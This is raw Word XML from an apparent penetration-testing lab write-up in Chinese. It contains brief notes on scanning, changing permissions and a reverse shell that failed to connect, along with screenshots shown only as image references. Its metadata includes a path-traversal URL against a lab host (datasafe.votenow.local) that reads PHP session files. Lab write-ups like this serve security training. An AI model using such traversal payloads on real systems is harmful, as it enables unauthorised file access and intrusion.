            <wp:docPr id="243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4A9B" w14:textId="3C7FDF5C" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002A57F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A89ABA" wp14:editId="4A0771B9">
            <wp:extent cx="5274310" cy="2382520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29770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096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EDB3" w14:textId="7DD16A4E" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确实有，还是要多扫即便</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41F0C8" w14:textId="20A859D8" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002A57F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758B85E3" wp14:editId="549095B4">
            <wp:extent cx="5274310" cy="997585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1464372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726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60D2" w14:textId="6C2AF532" w:rsidR="002A57F1" w:rsidRDefault="002A57F1" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改权限</w:t>
      </w:r>
      <w:r w:rsidR="0099410D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（反弹shell我连不上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0099410D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就吧文件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0099410D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制下来用攻击机连的）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8030A" w14:textId="44CC2015" w:rsidR="002A57F1" w:rsidRDefault="0099410D" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099410D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F7B0D9" wp14:editId="6D69F545">
            <wp:extent cx="5274310" cy="4382135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1489833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336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4E41" w14:textId="6311C567" w:rsidR="0099410D" w:rsidRPr="00150E71" w:rsidRDefault="0099410D" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099410D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A9086A9" wp14:editId="08C9075A">
            <wp:extent cx="5274310" cy="1858645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="2084911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111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ok</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0099410D" w:rsidRPr="00150E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8F38B" w14:textId="77777777" w:rsidR="00966D93" w:rsidRDefault="00966D93" w:rsidP="007B79B6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2C683872" w14:textId="77777777" w:rsidR="00966D93" w:rsidRDefault="00966D93" w:rsidP="007B79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06C67" w14:textId="77777777" w:rsidR="00966D93" w:rsidRDefault="00966D93" w:rsidP="007B79B6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="610A4718" w14:textId="77777777" w:rsidR="00966D93" w:rsidRDefault="00966D93" w:rsidP="007B79B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AEF"/>
    <w:rsid w:val="00035F06"/>
    <w:rsid w:val="000A60BE"/>
    <w:rsid w:val="00150E71"/>
    <w:rsid w:val="001D3FF9"/>
    <w:rsid w:val="00206AEF"/>
    <w:rsid w:val="0026278F"/>
    <w:rsid w:val="002A57F1"/>
    <w:rsid w:val="002C75B8"/>
    <w:rsid w:val="00452649"/>
    <w:rsid w:val="004A5243"/>
    <w:rsid w:val="004F720A"/>
    <w:rsid w:val="0051016D"/>
    <w:rsid w:val="00515320"/>
    <w:rsid w:val="00553B26"/>
    <w:rsid w:val="0059394B"/>
    <w:rsid w:val="005B7FAB"/>
    <w:rsid w:val="00623FFD"/>
    <w:rsid w:val="00666E88"/>
    <w:rsid w:val="006A6789"/>
    <w:rsid w:val="006D5C4C"/>
    <w:rsid w:val="0072410C"/>
    <w:rsid w:val="007355F7"/>
    <w:rsid w:val="007410C0"/>
    <w:rsid w:val="007B79B6"/>
    <w:rsid w:val="00860EED"/>
    <w:rsid w:val="00966D93"/>
    <w:rsid w:val="0099410D"/>
    <w:rsid w:val="009C0BF9"/>
    <w:rsid w:val="00BF164C"/>
    <w:rsid w:val="00C43278"/>
    <w:rsid w:val="00C77266"/>
    <w:rsid w:val="00CA503B"/>
    <w:rsid w:val="00CC1F5C"/>
    <w:rsid w:val="00D00810"/>
    <w:rsid w:val="00D15CC4"/>
    <w:rsid w:val="00DA309B"/>
    <w:rsid w:val="00F83F8F"/>
    <w:rsid w:val="00FE4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1F594C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E6499025-1278-4CBC-99DA-AC013259B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355F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355F7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7B79B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B79B6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B79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B79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datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_jn284slhmdsjnbel58uruk855v80nbi1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</Pages>
  <Words>307</Words>
  <Characters>1755</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>14</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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泽巍</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>obrine him</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-08T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-20T08:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>